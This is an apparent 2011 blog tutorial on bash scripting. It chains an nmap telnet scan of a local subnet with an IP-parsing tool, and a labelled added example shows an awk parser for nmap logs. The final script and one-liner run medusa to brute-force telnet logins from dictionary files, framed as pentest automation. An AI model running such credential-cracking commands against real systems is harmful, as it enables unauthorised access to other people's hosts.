
Saturday, May 7, 2011

Bash Scripting Basics

Seeing as I've recently posted my bash-friendly Java IP parser for use with other tools, I figured I would make a post detailing the basics of bash scripting and one possible way the parser might be used. To start off, open your text editor of choice; mine is nano. We will start by creating a file called "ba.sh" and specifying which shell we'd like this script to use by adding "#!/bin/bash" as the first line of the script.

#!/bin/bash

We add this line to tell the system to run the script with the "bash" interpreter located in the "/bin" directory.

Moving on to adding something useful. We can use a shell command like so:

#!/bin/bash
echo "Scanning the local network!"
nmap 10.0.0.1/24 -PN -sV -p 23

Now that we have a script that does something, we can save it (Ctrl-O in nano), make it executable with the chmod command, and then run it.

chmod 755 ba.sh
./ba.sh

This is nice and all, but not very useful, seeing as we could just enter the command ourselves. Next we will string together an nmap scan with my log parser to extract IPs from the log and write them in a list format.

#!/bin/bash
# Name of the nmap log, kept in a variable so it is set in one place
logfile="nlog"
echo "Scanning the local network!"
# -oG writes the results to the log in nmap's grepable format
nmap 10.0.0.1/24 -oG "$logfile" -PN -sV -p 23 --open
# The parser reads the log and writes the IPs to a file named "ips"
java -jar ips.jar "$logfile"
cat ips

This script is a bit more useful. It scans the local network for PCs with telnet running and writes the results to an nmap log, whose name we specify using a variable. That log is then parsed by my IP parser, and the IPs are written in a list format to a file named "ips". Finally we use the "cat" command (which reads a file and displays it in the terminal) to make sure all's well and the script worked.
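To show what the parsing step involves, here is an added example (not code from the original post, and not the author's ips.jar) that extracts the hosts with a given open port from a grepable nmap log using only awk and sort. The function names list_open_hosts and write_sample_log are hypothetical, and the log lines are a constructed sample in the -oG layout.

```bash
#!/bin/bash
# Added example: list hosts with a given open port from an nmap -oG log.

# list_open_hosts LOGFILE PORT
# Prints one IP per line, de-duplicated and sorted numerically by octet.
list_open_hosts() {
    local log="$1" port="$2"
    awk -v port="$port" '
        /^Host: / && /Ports: / {
            ip = $2                   # second field is the address
            sub(/^.*Ports: /, "")     # keep only the port list ...
            sub(/\t.*$/, "")          # ... up to the next tab-separated field
            n = split($0, entries, ", ")
            for (i = 1; i <= n; i++) {
                # each entry is port/state/protocol/owner/service/rpc/version/
                split(entries[i], f, "/")
                if (f[1] == port && f[2] == "open") { print ip; break }
            }
        }
    ' "$log" | sort -u -t . -k1,1n -k2,2n -k3,3n -k4,4n
}

# write_sample_log PATH
# Writes a constructed sample log (not real scan output) to PATH.
write_sample_log() {
    printf '%s\n' '# Nmap scan log (constructed sample)' > "$1"
    printf 'Host: %s (%s)\tStatus: Up\n' 10.0.0.9 '' >> "$1"
    # printf repeats the format for every group of three arguments
    printf 'Host: %s (%s)\tPorts: %s\n' \
        10.0.0.9  ''          '23/open/tcp//telnet//Linux telnetd/' \
        10.0.0.5  printer.lan '23/open/tcp//telnet///' \
        10.0.0.12 ''          '23/closed/tcp//telnet///' \
        10.0.0.20 ''          '22/open/tcp//ssh///, 23/filtered/tcp//telnet///' \
        10.0.0.30 ''          '22/open/tcp//ssh///, 23/open/tcp//telnet///' >> "$1"
}

sample="$(mktemp)"
write_sample_log "$sample"
list_open_hosts "$sample" 23    # prints 10.0.0.5, 10.0.0.9, 10.0.0.30
rm -f "$sample"
```

Matching on the state field rather than on the port number alone keeps closed and filtered entries out of the list, which matters when a log was produced without --open.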

If we were on a pentest and wanted to automate a process to scan the network and attempt to crack open telnets, we could use a script like this:

#!/bin/bash
logfile="nlog"
echo "Scanning the local network for hosts running telnet"
nmap 10.0.0.1/24 -oG "$logfile" -PN -sV -p 23 --open
java -jar ips.jar "$logfile"
medusa -H /root/ips -U /root/users -P /root/dictionary.txt -e ns -f -v 6 -O telcrack -M telnet

This script will essentially look for hosts running telnet and attempt to crack them with medusa. These are the very basics of bash scripting, and there are many other possibilities. I would also like to mention that when issuing commands in the terminal you can link them together using ";". So this script could be issued in a shell like this:

clear;logfile="nlog" ;echo "Scanning the local network for hosts running telnet";nmap 10.0.0.1/24 -oG $logfile -PN -sV -p 23 --open;java -jar ips.jar $logfile;medusa -H /root/ips -U /root/users -P /root/dictionary.txt -e ns -f -v 6 -O telcrack -M telnet

Note: You WILL need root to issue that command.


Well, those are the basics, and they show how the IP parser could be used to combine tools. I'll likely make more posts on bash scripting in the future, so stay tuned. You can find the ip parser here







